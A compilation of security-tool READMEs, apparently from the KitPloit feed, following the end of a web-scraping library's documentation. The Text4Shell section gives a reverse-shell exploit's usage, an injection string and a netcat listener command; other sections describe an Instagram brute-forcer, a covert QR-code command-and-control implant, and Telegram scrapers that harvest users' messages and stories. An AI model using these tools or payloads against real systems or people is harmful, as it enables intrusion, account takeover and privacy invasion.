[<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>]
>>> page.relocate(element_dict, adaptor_type=True).css('::text')
['Tipping the Velvet']

  • If you want to keep it as an lxml.etree object, leave out the adaptor_type argument:

>>> page.relocate(element_dict)
[<Element a at 0x105a2a7b0>]

  • Filtering results based on a function

# Find all products over $50
expensive_products = page.css('.product_pod').filter(
    lambda p: float(p.css('.price_color').re_first(r'[\d\.]+')) > 50
)
  • Searching results for the first one that matches a function
# Find the first product with price '54.23'
page.css('.product_pod').search(
    lambda p: float(p.css('.price_color').re_first(r'[\d\.]+')) == 54.23
)
  • Doing operations on element content is the same as in Scrapy:

quote.re(r'regex_pattern')        # Get all strings (TextHandlers) that match the regex pattern
quote.re_first(r'regex_pattern')  # Get the first string (TextHandler) only
quote.json()                      # If the content text is JSON-able, convert it to JSON using `orjson`, which is 10x faster than the standard json library and provides more options

    Except that you can do more with them, like:

quote.re(
    r'regex_pattern',
    replace_entities=True,  # Character entity references are replaced by their corresponding character
    clean_match=True,       # Ignore all whitespaces and consecutive spaces while matching
    case_sensitive=False,   # Set the regex to ignore letter case while compiling it
)

    All of these methods come from the TextHandler that contains the text content, so the same can be done directly if you call the .text property or an equivalent selector function.

  • Doing operations on the text content itself includes:

  • Cleaning the text of any whitespace and replacing consecutive spaces with a single space:

quote.clean()

  • You already know about the regex matching and the fast JSON parsing, but did you know that all strings returned from a regex search are actually TextHandler objects too? So when, for example, a JS object is assigned to a JS variable inside JS code and you want to extract it with regex and then convert it to a JSON object, other libraries would need more than one line of code, but here it's one line:

page.xpath('//script/text()').re_first(r'var dataLayer = (.+);').json()

  • Sorting all characters in the string as if it were a list and returning the new string:

quote.sort(reverse=False)

    To be clear, TextHandler is a sub-class of Python's str so all normal operations/methods that work with Python strings will work with it.

  • Any element's attributes are not exactly a dictionary but a read-only sub-class of mapping called AttributesHandler, so it's faster, and the string values returned are actually TextHandler objects, so all the operations above can be done on them, plus standard dictionary operations that don't modify the data, and more :)

  • Unlike standard dictionaries, here you can also search by values and do partial searches. It might be handy in some cases (returns a generator of matches):

>>> for item in element.attrib.search_values('catalogue', partial=True):
...     print(item)
{'href': 'catalogue/tipping-the-velvet_999/index.html'}

  • Serialize the current attributes to JSON bytes:

>>> element.attrib.json_string
b'{"href":"catalogue/tipping-the-velvet_999/index.html","title":"Tipping the Velvet"}'

  • Converting it to a normal dictionary:

>>> dict(element.attrib)
{'href': 'catalogue/tipping-the-velvet_999/index.html', 'title': 'Tipping the Velvet'}

Scrapling is under active development so expect many more features coming soon :)

More Advanced Usage

There are a lot of deep details skipped here to keep this as short as possible, so to take a deep dive, head to the docs section. I will try to keep it as up to date as possible and add complex examples. There I will explain points like how to write your own storage system, how to write spiders that don't depend on selectors at all, and more...

Note that implementing your storage system can be complex as there are some strict rules such as inheriting from the same abstract class, following the singleton design pattern used in other classes, and more. So make sure to read the docs first.

[!IMPORTANT] A website is needed to provide detailed library documentation.
I'm trying to rush creating the website, researching new ideas, and adding more features/tests/benchmarks but time is tight with too many spinning plates between work, personal life, and working on Scrapling. I have been working on Scrapling for months for free after all.

If you like Scrapling and want it to keep improving then this is a friendly reminder that you can help by supporting me through the sponsor button.

⚑ Enlightening Questions and FAQs

This section addresses common questions about Scrapling, please read this section before opening an issue.

How does auto-matching work?

  1. You need to get a working selector and run it at least once with methods css or xpath with the auto_save parameter set to True before structural changes happen.
  2. Before returning results for you, Scrapling uses its configured database and saves unique properties about that element.
  3. Now because everything about the element can be changed or removed, nothing from the element can be used as a unique identifier for the database. To solve this issue, I made the storage system rely on two things:

    1. The domain of the URL you gave while initializing the first Adaptor object
    2. The identifier parameter you passed to the method while selecting. If you didn't pass one, then the selector string itself will be used as an identifier but remember you will have to use it as an identifier value later when the structure changes and you want to pass the new selector.

    Together, both are used to retrieve the element's unique properties from the database later.

  4. Later, when you enable the auto_match parameter for both the Adaptor instance and the method call, the element's properties are retrieved and Scrapling loops over all elements on the page, comparing each one's unique properties to the unique properties we already have for this element; a score is calculated for each one.
  5. Comparing elements is not exact but is about how similar these values are, so everything is taken into consideration, even the order of values, like the order in which the element's class names were written before and the order in which the same class names are written now.
  6. The score for each element is stored in the table, and the element(s) with the highest combined similarity scores are returned.

How does the auto-matching work if I didn't pass a URL while initializing the Adaptor object?

Not a big problem, as it depends on your usage. The word default will be used in place of the URL field while saving the element's unique properties. So this will only be an issue if you later use the same identifier for a different website that you also initialized without passing the URL parameter. The save process will overwrite the previous data, and auto-matching uses only the latest saved properties.

If all things about an element can change or get removed, what are the unique properties to be saved?

For each element, Scrapling will extract:

  • The element's tag name, text, attributes (names and values), siblings (tag names only), and path (tag names only).
  • The element's parent tag name, attributes (names and values), and text.

I have enabled the auto_save/auto_match parameter while selecting and it got completely ignored with a warning message

That's because passing the auto_save/auto_match argument without setting auto_match to True while initializing the Adaptor object will only result in ignoring the auto_save/auto_match argument value. This behavior is purely for performance reasons so the database gets created only when you are planning to use the auto-matching features.

I have done everything as the docs but the auto-matching didn't return anything, what's wrong?

It could be one of these reasons:

  1. No data was saved/stored for this element before.
  2. The selector passed is not the one used while storing the element's data. The solution is simple:
     • Pass the old selector again as an identifier to the method called.
     • Retrieve the element with the retrieve method using the old selector as the identifier, then save it again with the save method and the new selector as the identifier.
     • Start using the identifier argument more often if you plan to keep using new selectors from now on.
  3. The website had some extreme structural changes, like a whole new design. If this happens a lot with a website, the solution is to make your code as selector-free as possible using Scrapling's features.
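
A minimal sketch of the first fix above, assuming the css/css_first methods accept the identifier keyword exactly as described in the auto-matching explanation (the selectors and the page variable here are hypothetical):

>> # The element's properties were saved under the old selector, so pass it as the identifier
>> old_selector = '#old-menu > li:nth-child(1) > a'
>> page.css_first('.new-menu a', auto_match=True, identifier=old_selector)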

Can Scrapling replace code built on top of BeautifulSoup4?

Pretty much yeah, almost all features you get from BeautifulSoup can be found or achieved in Scrapling one way or another. In fact, if you see there's a feature in bs4 that is missing in Scrapling, please make a feature request from the issues tab to let me know.

Can Scrapling replace code built on top of AutoScraper?

Of course, you can find elements by text/regex, find similar elements in a more reliable way than AutoScraper, and finally save/retrieve elements manually to use later as the model feature in AutoScraper. I have pulled all top articles about AutoScraper from Google and tested Scrapling against examples in them. In all examples, Scrapling got the same results as AutoScraper in much less time.

Is Scrapling thread-safe?

Yes, Scrapling instances are thread-safe. Each Adaptor instance maintains its state.


Contributing

Everybody is invited and welcome to contribute to Scrapling. There is a lot to do!

Please read the contributing file before doing anything.

Disclaimer for Scrapling Project

[!CAUTION] This library is provided for educational and research purposes only. By using this library, you agree to comply with local and international laws regarding data scraping and privacy. The authors and contributors are not responsible for any misuse of this software. This library should not be used to violate the rights of others, for unethical purposes, or to use data in an unauthorized or illegal manner. Do not use it on any website unless you have permission from the website owner or within their allowed rules like the robots.txt file, for example.

License

This work is licensed under BSD-3

Acknowledgments

This project includes code adapted from: - Parsel (BSD License) - Used for translator submodule

Thanks and References

Known Issues

  • In the auto-matching save process, only the unique properties of the first element from the selection results are saved. So if the selector you are using matches different elements on the page that are in different locations, auto-matching will probably return only the first element when you relocate it later. This doesn't apply to combined CSS selectors (using commas to combine more than one selector, for example), as those selectors get separated and each selector is executed alone.

Designed & crafted with ❀️ by Karim Shoair.




Text4Shell-Exploit - A Custom Python-based Proof-Of-Concept (PoC) Exploit Targeting Text4Shell (CVE-2022-42889), A Critical Remote Code Execution Vulnerability In Apache Commons Text Versions < 1.10

By: Unknown β€” April 23rd 2025 at 12:30


A custom Python-based proof-of-concept (PoC) exploit targeting Text4Shell (CVE-2022-42889), a critical remote code execution vulnerability in Apache Commons Text versions < 1.10. This exploit targets vulnerable Java applications that use the StringSubstitutor class with interpolation enabled, allowing injection of ${script:...} expressions to execute arbitrary system commands.

In this PoC, exploitation is demonstrated via the data query parameter; however, the vulnerable parameter name may vary depending on the implementation. Users should adapt the payload and request path accordingly based on the target application's logic.

Disclaimer: This exploit is provided for educational and authorized penetration testing purposes only. Use responsibly and at your own risk.


Description

This is a custom Python3 exploit for the Apache Commons Text vulnerability known as Text4Shell (CVE-2022-42889). It allows Remote Code Execution (RCE) via insecure interpolators when user input is dynamically evaluated by StringSubstitutor.

Tested against:

  • Apache Commons Text < 1.10.0
  • Java applications using ${script:...} interpolation from untrusted input

Usage

python3 text4shell.py <target_ip> <callback_ip> <callback_port>

Example

python3 text4shell.py 127.0.0.1 192.168.1.2 4444

Make sure to set up a listener on your attacking machine:

nc -nlvp 4444

Payload Logic

The script injects:

${script:javascript:java.lang.Runtime.getRuntime().exec(...)}

The reverse shell payload is sent via the data parameter using a POST request.
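
For illustration, here is a hedged sketch of the kind of request such a PoC might send. The port, path, and parameter name are assumptions (the README itself notes the vulnerable parameter varies per target), and the injected command is kept benign here; the actual exploit places a reverse-shell command inside the exec(...) call.

import sys
import requests

target_ip = sys.argv[1]

# Benign stand-in command; the real PoC places a reverse-shell command here
payload = "${script:javascript:java.lang.Runtime.getRuntime().exec('id')}"

# Path and parameter name are assumptions; adapt them to the target application's logic
response = requests.post(f"http://{target_ip}:8080/", data={"data": payload}, timeout=10)
print(response.status_code)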




Instagram-Brute-Force-2024 - Instagram Brute Force 2024 Compatible With Python 3.13 / X64 Bit / Only Chrome Browser

By: Unknown β€” April 13th 2025 at 12:30


Instagram Brute Force CPU/GPU Supported 2024

(Use option 2 while running the script.)

(Option 1 is under development.)

(Chrome must be installed on the device.)

Compatible and Tested (GUI Supported Operating Systems Only)

Python 3.13 x64 bit Unix / Linux / Mac / Windows 8.1 and higher


Install Requirements

pip install -r requirements.txt

How to run

python3 instagram_brute_force.py [instagram_username_without_hashtag]
python3 instagram_brute_force.py mrx161



QuickResponseC2 - A Command & Control Server That Leverages QR Codes To Send Commands And Receive Results From Remote Systems

By: Unknown β€” April 12th 2025 at 12:30



QuickResponseC2 is a stealthy Command and Control (C2) framework that enables indirect and covert communication between the attacker and victim machines via an intermediate HTTP/S server. All network activity is limited to uploading and downloading images, making it fully undetectable by IPS/IDS systems and an ideal tool for security research and penetration testing.


Capabilities:

  • Command Execution via QR Codes:
    Users can send custom commands to the victim machine, encoded as QR codes.
    Victims scan the QR code, which triggers the execution of the command on their system.
    The command can be anything from simple queries to complex operations based on the test scenario.

  • Result Retrieval:
    Results of the executed command are returned from the victim system and encoded into a QR code.
    The server decodes the result and provides feedback to the attacker for further analysis or follow-up actions.

  • Built-in HTTP Server:
    The tool includes a lightweight HTTP server that facilitates the victim machine's retrieval of command QR codes.
    Results are sent back to the server as QR code images, and they are automatically saved with unique filenames for easy management.
    The attacker's machine handles multiple requests, with HTTP logs organized and saved separately.

  • Stealthy Communication:
    QuickResponseC2 operates under the radar, with minimal traces, providing a covert way to interact with the victim machine without alerting security defenses.
    Ideal for security assessments or testing command-and-control methodologies without being detected.

  • File Handling:
    The tool automatically saves all QR codes (command and result) to the server_files directory, using sequential filenames like command0.png, command1.png, etc.
    Decoding and processing of result files are handled seamlessly.

  • User-Friendly Interface:
    The tool is operated via a simple command-line interface, allowing users to set up a C2 server, send commands, and receive results with ease.
    No additional complex configurations or dependencies are needed.

Usage

  1. First, install the dependencies:

     pip3 install -r requirements.txt

  2. Then, run main.py:

     python3 main.py

  3. Choose between the options:

     1 - Run the C2 Server
     2 - Build the Victim Implant

  4. Enjoy!

Demonstration

https://github.com/user-attachments/assets/382e9350-d650-44e5-b8ef-b43ec90b315d

Workflow Overview

1. Initialization of the C2 Server

  • The attacker launches QuickResponseC2, which creates a lightweight HTTP server (default port: 8080).
  • This server serves as the intermediary between the attacker and victim, eliminating any direct connection between them.

2. Command Delivery via QR Codes

  • The attacker encodes a command into a QR code and saves it as commandX.png on the HTTP server.
  • The victim machine periodically polls the server (e.g., every 1 second) to check for the presence of a new command file.

3. Victim Command Execution

  • Once the victim detects a new QR code file (commandX.png), it downloads and decodes the image to retrieve the command.
  • The decoded command is executed on the victim's system.

4. Result Encoding and Uploading

  • The victim encodes the output of the executed command into a QR code and saves it locally as resultX.png.
  • The result file is then uploaded to the HTTP server.

5. Result Retrieval by the Attacker

  • The attacker periodically checks the server for new result files (resultX.png).
  • Once found, the result file is downloaded and decoded to retrieve the output of the executed command.
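
To make the QR round-trip concrete, here is a minimal sketch of the encode/decode steps the server performs (steps 2 and 5 above). The qrcode and pyzbar libraries and the server_files layout are assumptions based on the description; the actual tool handles the sequential filenames and HTTP transport for you.

import os

import qrcode                     # assumed QR generation library
from PIL import Image
from pyzbar.pyzbar import decode  # assumed QR decoding library

os.makedirs("server_files", exist_ok=True)

# Step 2: encode a command into the next sequential image (command0.png, command1.png, ...)
qrcode.make("whoami").save("server_files/command0.png")

# Step 5: once result0.png has been uploaded by the implant, decode it to recover the output
result_img = Image.open("server_files/result0.png")
print(decode(result_img)[0].data.decode())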

TODO & Contribution

  • [x] Generate a Template for the Implant
  • [ ] Compile the implant as an .exe automatically
  • [x] Save the generated QR Code as bytes in a variable instead of a file - VICTIM Side
  • [ ] Add an obfuscation on the commands decoded from the QR Codes automatically

Feel free to fork and contribute! Pull requests are welcome.




Telegram-Scraper - A Powerful Python Script That Allows You To Scrape Messages And Media From Telegram Channels Using The Telethon Library

By: Unknown β€” April 11th 2025 at 12:30


A powerful Python script that allows you to scrape messages and media from Telegram channels using the Telethon library. Features include real-time continuous scraping, media downloading, and data export capabilities.

___________________  _________
\__ ___/ _____/ / _____/
| | / \ ___ \_____ \
| | \ \_\ \/ \
|____| \______ /_______ /
\/ \/

Features πŸš€

  • Scrape messages from multiple Telegram channels
  • Download media files (photos, documents)
  • Real-time continuous scraping
  • Export data to JSON and CSV formats
  • SQLite database storage
  • Resume capability (saves progress)
  • Media reprocessing for failed downloads
  • Progress tracking
  • Interactive menu interface

Prerequisites πŸ“‹

Before running the script, you'll need:

  • Python 3.7 or higher
  • Telegram account
  • API credentials from Telegram

Required Python packages

pip install -r requirements.txt

Contents of requirements.txt:

telethon
aiohttp
asyncio

Getting Telegram API Credentials πŸ”‘

  1. Visit https://my.telegram.org/auth
  2. Log in with your phone number
  3. Click on "API development tools"
  4. Fill in the form:
     - App title: Your app name
     - Short name: Your app short name
     - Platform: Can be left as "Desktop"
     - Description: Brief description of your app
  5. Click "Create application"
  6. You'll receive:
     - api_id: A number
     - api_hash: A string of letters and numbers

Keep these credentials safe, you'll need them to run the script!

Setup and Running πŸ”§

  1. Clone the repository:
git clone https://github.com/unnohwn/telegram-scraper.git
cd telegram-scraper
  2. Install requirements:
pip install -r requirements.txt
  3. Run the script:
python telegram-scraper.py
  4. On first run, you'll be prompted to enter:
     - Your API ID
     - Your API Hash
     - Your phone number (with country code)
     - Your phone number again, or a bot token; choose the phone number option when prompted this second time
     - Verification code (sent to your Telegram)

Initial Scraping Behavior πŸ•’

When scraping a channel for the first time, please note:

  • The script will attempt to retrieve the entire channel history, starting from the oldest messages
  • Initial scraping can take several minutes or even hours, depending on:
  • The total number of messages in the channel
  • Whether media downloading is enabled
  • The size and number of media files
  • Your internet connection speed
  • Telegram's rate limiting
  • The script uses pagination and maintains state, so if interrupted, it can resume from where it left off
  • Progress percentage is displayed in real-time to track the scraping status
  • Messages are stored in the database as they are scraped, so you can start analyzing available data even before the scraping is complete

Usage πŸ“

The script provides an interactive menu with the following options:

  • [A] Add new channel
  • Enter the channel ID or channelname
  • [R] Remove channel
  • Remove a channel from scraping list
  • [S] Scrape all channels
  • One-time scraping of all configured channels
  • [M] Toggle media scraping
  • Enable/disable downloading of media files
  • [C] Continuous scraping
  • Real-time monitoring of channels for new messages
  • [E] Export data
  • Export to JSON and CSV formats
  • [V] View saved channels
  • List all saved channels
  • [L] List account channels
  • List all channels with ID:s for account
  • [Q] Quit

Channel IDs πŸ“’

You can use either: - Channel username (e.g., channelname) - Channel ID (e.g., -1001234567890)

Data Storage πŸ’Ύ

Database Structure

Data is stored in SQLite databases, one per channel:

  - Location: ./channelname/channelname.db
  - Table: messages, with the following columns:
     - id: Primary key
     - message_id: Telegram message ID
     - date: Message timestamp
     - sender_id: Sender's Telegram ID
     - first_name: Sender's first name
     - last_name: Sender's last name
     - username: Sender's username
     - message: Message text
     - media_type: Type of media (if any)
     - media_path: Local path to downloaded media
     - reply_to: ID of replied message (if any)
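
That layout can be reproduced with Python's built-in sqlite3 module; the column types below are illustrative assumptions, not necessarily the script's exact schema:

import sqlite3

conn = sqlite3.connect("channelname.db")
conn.execute("""
    CREATE TABLE IF NOT EXISTS messages (
        id          INTEGER PRIMARY KEY,
        message_id  INTEGER,
        date        TEXT,
        sender_id   INTEGER,
        first_name  TEXT,
        last_name   TEXT,
        username    TEXT,
        message     TEXT,
        media_type  TEXT,
        media_path  TEXT,
        reply_to    INTEGER
    )
""")
conn.commit()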

Media Storage πŸ“

Media files are stored in: - Location: ./channelname/media/ - Files are named using message ID or original filename

Exported Data πŸ“Š

Data can be exported in two formats:

  1. CSV: ./channelname/channelname.csv
     - Human-readable spreadsheet format
     - Easy to import into Excel/Google Sheets
  2. JSON: ./channelname/channelname.json
     - Structured data format
     - Ideal for programmatic processing

Features in Detail πŸ”

Continuous Scraping

The continuous scraping feature ([C] option) allows you to: - Monitor channels in real-time - Automatically download new messages - Download media as it's posted - Run indefinitely until interrupted (Ctrl+C) - Maintains state between runs

Media Handling

The script can download: - Photos - Documents - Other media types supported by Telegram - Automatically retries failed downloads - Skips existing files to avoid duplicates

Error Handling πŸ› οΈ

The script includes: - Automatic retry mechanism for failed media downloads - State preservation in case of interruption - Flood control compliance - Error logging for failed operations

Limitations ⚠️

  • Respects Telegram's rate limits
  • Can only access public channels or channels you're a member of
  • Media download size limits apply as per Telegram's restrictions

Contributing 🀝

Contributions are welcome! Please feel free to submit a Pull Request.

License πŸ“„

This project is licensed under the MIT License - see the LICENSE file for details.

Disclaimer βš–οΈ

This tool is for educational purposes only. Make sure to: - Respect Telegram's Terms of Service - Obtain necessary permissions before scraping - Use responsibly and ethically - Comply with data protection regulations



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Lobo GuarΓ‘ - Cyber Threat Intelligence Platform

By: Unknown β€” April 9th 2025 at 12:30


Lobo GuarΓ‘ is a platform aimed at cybersecurity professionals, with various features focused on Cyber Threat Intelligence (CTI). It offers tools that make it easier to identify threats, monitor data leaks, analyze suspicious domains and URLs, and much more.


Features

1. SSL Certificate Search

Allows identifying domains and subdomains that may pose a threat to organizations. SSL certificates issued by trusted authorities are indexed in real-time, and users can search using keywords of 4 or more characters.

Note: The current database contains certificates issued from September 5, 2024.

2. SSL Certificate Discovery

Allows the insertion of keywords for monitoring. When a certificate is issued and the common name contains the keyword (minimum of 5 characters), it will be displayed to the user.

3. Tracking Link

Generates a link to capture device information from attackers. Useful when the security professional can contact the attacker in some way.

4. Domain Scan

Performs a scan on a domain, displaying whois information and subdomains associated with that domain.

5. Web Path Scan

Allows performing a scan on a URL to identify URIs (web paths) related to that URL.

6. URL Scan

Performs a scan on a URL, generating a screenshot and a mirror of the page. The result can be made public to assist in taking down malicious websites.

7. URL Monitoring

Monitors a URL with no active application until it returns an HTTP 200 code. At that moment, it automatically initiates a URL scan, providing evidence for actions against malicious sites.
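
Conceptually, this feature reduces to a polling loop like the sketch below (the interval, timeout, and error handling are illustrative assumptions, not Lobo GuarΓ‘'s implementation):

import time
import requests

def wait_until_live(url, interval=60):
    """Poll a not-yet-active URL until it answers with HTTP 200, then hand it off to a URL scan."""
    while True:
        try:
            if requests.get(url, timeout=10).status_code == 200:
                return True   # site is now live: trigger the URL scan and collect evidence
        except requests.RequestException:
            pass              # not resolving / refusing connections yet
        time.sleep(interval)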

8. Data Leak

  • Data Leak Alerts: Monitors and presents almost real-time data leaks posted in hacker forums and websites.
  • URL+User+Password: Allows searching by URL, username, or password, helping identify leaked data from clients or employees.

9. Threat Intelligence Feeds

Centralizes intelligence news from various channels, keeping users updated on the latest threats.

Installation

The installation has been validated on the Ubuntu 24.04 Server and Red Hat 9.4 distributions; the implementation guides are linked below:

Lobo GuarΓ‘ Implementation on Ubuntu 24.04

Lobo GuarΓ‘ Implementation on Red Hat 9.4

There is a Dockerfile and a docker-compose version of Lobo GuarΓ‘ too. Just clone the repo and do:

docker compose up

Then, go to your web browser at localhost:7405.

Dependencies

Before proceeding with the installation, ensure the following dependencies are installed:

  • PostgreSQL
  • Python 3.12
  • ChromeDriver and Google Chrome (version 129.0.6668.89)
  • FFUF (version 2.0.0)
  • Subfinder (version 2.6.6)

Installation Instructions

  1. Clone the repository:
git clone https://github.com/olivsec/loboguara.git
  2. Enter the project directory:
cd loboguara/
  3. Edit the configuration file:
nano server/app/config.py

Fill in the required parameters in the config.py file:

class Config:
    SECRET_KEY = 'YOUR_SECRET_KEY_HERE'
    SQLALCHEMY_DATABASE_URI = 'postgresql://guarauser:YOUR_PASSWORD_HERE@localhost/guaradb?sslmode=disable'
    SQLALCHEMY_TRACK_MODIFICATIONS = False

    MAIL_SERVER = 'smtp.example.com'
    MAIL_PORT = 587
    MAIL_USE_TLS = True
    MAIL_USERNAME = 'no-reply@example.com'
    MAIL_PASSWORD = 'YOUR_SMTP_PASSWORD_HERE'
    MAIL_DEFAULT_SENDER = 'no-reply@example.com'

    ALLOWED_DOMAINS = ['yourdomain1.my.id', 'yourdomain2.com', 'yourdomain3.net']

    API_ACCESS_TOKEN = 'YOUR_LOBOGUARA_API_TOKEN_HERE'
    API_URL = 'https://loboguara.olivsec.com.br/api'

    CHROME_DRIVER_PATH = '/opt/loboguara/bin/chromedriver'
    GOOGLE_CHROME_PATH = '/opt/loboguara/bin/google-chrome'
    FFUF_PATH = '/opt/loboguara/bin/ffuf'
    SUBFINDER_PATH = '/opt/loboguara/bin/subfinder'

    LOG_LEVEL = 'ERROR'
    LOG_FILE = '/opt/loboguara/logs/loboguara.log'
  4. Make the installation script executable and run it:
sudo chmod +x ./install.sh
sudo ./install.sh
  5. Start the service after installation:
sudo -u loboguara /opt/loboguara/start.sh

Access the URL below to register the Lobo GuarΓ‘ Super Admin

http://your_address:7405/admin

Online Platform

Access the Lobo GuarΓ‘ platform online: https://loboguara.olivsec.com.br/



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Telegram-Story-Scraper - A Python Script That Allows You To Automatically Scrape And Download Stories From Your Telegram Friends

By: Unknown β€” April 8th 2025 at 12:30


A Python script that allows you to automatically scrape and download stories from your Telegram friends using the Telethon library. The script continuously monitors and saves both photos and videos from stories, along with their metadata.


Important Note About Story Access ⚠️

Due to Telegram API restrictions, this script can only access stories from: - Users you have added to your friend list - Users whose privacy settings allow you to view their stories

This is a limitation of Telegram's API and cannot be bypassed.

Features πŸš€

  • Automatically scrapes all available stories from your Telegram friends
  • Downloads both photos and videos from stories
  • Stores metadata in SQLite database
  • Exports data to Excel spreadsheet
  • Real-time monitoring with customizable intervals
  • Timestamp is set to (UTC+2)
  • Maintains record of previously downloaded stories
  • Resume capability
  • Automatic retry mechanism

Prerequisites πŸ“‹

Before running the script, you'll need:

  • Python 3.7 or higher
  • Telegram account
  • API credentials from Telegram
  • Friends on Telegram whose stories you want to track

Required Python packages

pip install -r requirements.txt

Contents of requirements.txt:

telethon
openpyxl
schedule

Getting Telegram API Credentials πŸ”‘

  1. Visit https://my.telegram.org/auth
  2. Log in with your phone number
  3. Click on "API development tools"
  4. Fill in the form:
     - App title: Your app name
     - Short name: Your app short name
     - Platform: Can be left as "Desktop"
     - Description: Brief description of your app
  5. Click "Create application"
  6. You'll receive:
     - api_id: A number
     - api_hash: A string of letters and numbers

Keep these credentials safe, you'll need them to run the script!

Setup and Running πŸ”§

  1. Clone the repository:
git clone https://github.com/unnohwn/telegram-story-scraper.git
cd telegram-story-scraper
  2. Install requirements:
pip install -r requirements.txt
  3. Run the script:
python TGSS.py
  4. On first run, you'll be prompted to enter:
     - Your API ID
     - Your API Hash
     - Your phone number (with country code)
     - Verification code (sent to your Telegram)
     - Checking interval in seconds (default is 60)

How It Works πŸ”„

The script:

  1. Connects to your Telegram account
  2. Periodically checks for new stories from your friends
  3. Downloads any new stories (photos/videos)
  4. Stores metadata in a SQLite database
  5. Exports information to an Excel file
  6. Runs continuously until interrupted (Ctrl+C)
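
A minimal sketch of that loop, using the schedule package listed in requirements.txt, is shown below; check_for_new_stories() is a hypothetical placeholder for the Telethon download and database logic:

import time
import schedule

def check_for_new_stories():
    ...   # hypothetical: fetch active stories via Telethon, download media, update stories.db and the export

interval = 60                                      # checking interval entered on first run (default: 60 s)
schedule.every(interval).seconds.do(check_for_new_stories)

while True:                                        # runs continuously until interrupted with Ctrl+C
    schedule.run_pending()
    time.sleep(1)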

Data Storage πŸ’Ύ

Database Structure (stories.db)

SQLite database containing: - user_id: Telegram user ID of the story creator - story_id: Unique story identifier - timestamp: When the story was posted (UTC+2) - filename: Local filename of the downloaded media

CSV and Excel Export (stories_export.csv/xlsx)

Export file containing the same information as the database, useful for: - Easy viewing of story metadata - Filtering and sorting - Data analysis - Sharing data with others

Media Storage πŸ“

  • Photos are saved as: {user_id}_{story_id}.jpg
  • Videos are saved with their original extension: {user_id}_{story_id}.{extension}
  • All media files are saved in the script's directory

Features in Detail πŸ”

Continuous Monitoring

  • Customizable checking interval (default: 60 seconds)
  • Runs continuously until manually stopped
  • Maintains state between runs
  • Avoids duplicate downloads

Media Handling

  • Supports both photos and videos
  • Automatically detects media type
  • Preserves original quality
  • Generates unique filenames

Error Handling πŸ› οΈ

The script includes: - Automatic retry mechanism for failed downloads - Error logging for failed operations - Connection error handling - State preservation in case of interruption

Limitations ⚠️

  • Subject to Telegram's rate limits
  • Stories must be currently active (not expired)
  • Media download size limits apply as per Telegram's restrictions

Contributing 🀝

Contributions are welcome! Please feel free to submit a Pull Request.

License πŸ“„

This project is licensed under the MIT License - see the LICENSE file for details.

Disclaimer βš–οΈ

This tool is for educational purposes only. Make sure to: - Respect Telegram's Terms of Service - Obtain necessary permissions before scraping - Use responsibly and ethically - Comply with data protection regulations - Respect user privacy



☐ β˜† βœ‡ KitPloit - PenTest Tools!

gitGRAB - This Tool Is Designed To Interact With The GitHub API And Retrieve Specific User Details, Repository Information, And Commit Emails For A Given User

By: Unknown β€” April 7th 2025 at 12:30


This tool is designed to interact with the GitHub API and retrieve specific user details, repository information, and commit emails for a given user.


Install Requests

pip install requests

Execute the program

python3 gitgrab.py



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Snoop - OSINT Tool For Research Social Media Accounts By Username

By: Unknown β€” April 6th 2025 at 12:30


OSINT tool for researching social media accounts by username


Install Requests

pip install requests

Install BeautifulSoup

pip install beautifulsoup4

Execute the program

python3 snoop.py



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Mass-Assigner - Simple Tool Made To Probe For Mass Assignment Vulnerability Through JSON Field Modification In HTTP Requests

By: Unknown β€” September 19th 2024 at 11:30


Mass Assigner is a powerful tool designed to identify and exploit mass assignment vulnerabilities in web applications. It achieves this by first retrieving data from a specified request, such as fetching user profile data. Then, it systematically attempts to apply each parameter extracted from the response to a second request provided, one parameter at a time. This approach allows for the automated testing and exploitation of potential mass assignment vulnerabilities.
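
The core idea can be sketched in a few lines. The example below mirrors the tool's defaults (GET for the source request, PUT for the target request) but is an illustration of the technique, not the actual implementation; the URLs are placeholders:

import requests

origin = requests.get("http://example.com/api/v1/me").json()      # 1. fetch e.g. the user profile

for key, value in origin.items():                                  # 2. replay one field at a time
    resp = requests.put("http://example.com/api/v1/me", json={key: value})
    # A 2xx response on a field the user should not control (e.g. "role") hints at mass assignment
    print(key, resp.status_code, len(resp.content))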


Disclaimer

This tool actively modifies server-side data. Please ensure you have proper authorization before use. Any unauthorized or illegal activity using this tool is entirely at your own risk.

Features

  • Enables the addition of custom headers within requests
  • Offers customization of various HTTP methods for both origin and target requests
  • Supports rate-limiting to manage request thresholds effectively
  • Provides the option to specify "ignored parameters" which the tool will ignore during execution
  • Improved the support in nested arrays/objects inside JSON data in responses

What's Next

  • Support additional content types, such as "application/x-www-form-urlencoded"

Installation & Usage

Install requirements

pip3 install -r requirements.txt

Run the script

python3 mass_assigner.py --fetch-from "http://example.com/path-to-fetch-data" --target-req "http://example.com/path-to-probe-the-data"

Arguments

Mass Assigner accepts the following arguments:

  -h, --help            show this help message and exit
--fetch-from FETCH_FROM
URL to fetch data from
--target-req TARGET_REQ
URL to send modified data to
-H HEADER, --header HEADER
Add a custom header. Format: 'Key: Value'
-p PROXY, --proxy PROXY
Use Proxy, Usage i.e: http://127.0.0.1:8080.
-d DATA, --data DATA Add data to the request body. JSON is supported with escaping.
--rate-limit RATE_LIMIT
Number of requests per second
--source-method SOURCE_METHOD
HTTP method for the initial request. Default is GET.
--target-method TARGET_METHOD
HTTP method for the modified request. Default is PUT.
--ignore-params IGNORE_PARAMS
Parameters to ignore during modification, separated by comma.

Example Usage:

python3 mass_assigner.py --fetch-from "http://example.com/api/v1/me" --target-req "http://example.com/api/v1/me" --header "Authorization: Bearer XXX" --proxy "http://proxy.example.com" --data '{\"param1\": \"test\", \"param2\":true}'



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Hfinger - Fingerprinting HTTP Requests

By: Unknown β€” June 24th 2024 at 12:30


Tool for Fingerprinting HTTP requests of malware. Based on Tshark and written in Python3. Working prototype stage :-)

Its main objective is to provide unique representations (fingerprints) of malware requests, which help in their identification. Unique means here that each fingerprint should be seen only in one particular malware family, yet one family can have multiple fingerprints. Hfinger represents the request in a shorter form than printing the whole request, but still human interpretable.

Hfinger can be used in manual malware analysis but also in sandbox systems or SIEMs. The generated fingerprints are useful for grouping requests, pinpointing requests to particular malware families, identifying different operations of one family, or discovering unknown malicious requests omitted by other security systems but which share a fingerprint.

An academic paper accompanies work on this tool, describing, for example, the motivation of design choices, and the evaluation of the tool compared to p0f, FATT, and Mercury.


    The idea

